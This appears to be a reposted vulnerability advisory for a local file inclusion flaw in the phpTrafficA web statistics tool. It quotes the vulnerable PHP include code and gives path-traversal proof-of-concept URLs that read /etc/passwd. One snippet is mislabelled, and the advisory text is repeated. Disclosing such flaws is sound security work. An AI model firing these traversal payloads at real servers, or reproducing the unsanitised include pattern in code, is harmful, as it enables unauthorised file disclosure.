phpTrafficA-1.4.1 Local File Inclusion

phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.
It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more!

http://soft.zoneo.net/phpTrafficA/


Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

Vulnerable Systems:
Version: phpTrafficA-1.4.1
phpTrafficA-1.4beta4
(also tested on phpTrafficA-1.3)

Description:
Input passed to the "file" parameter in "plotStat.php" and "lang" parameter in "banref.php" is not properly verified, before it is used to include files.
This can be exploited to include/see arbitrary files from local resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);



//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
$lang = $_GET["lang"];
if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");


POC exploit :
The following URL will cause local file inclusion

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00

# http://www.bugtraq.ir

phpTrafficA-1.4beta4
phpTrafficA-1.3

//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);



//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
$lang = $_GET["lang"];
if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00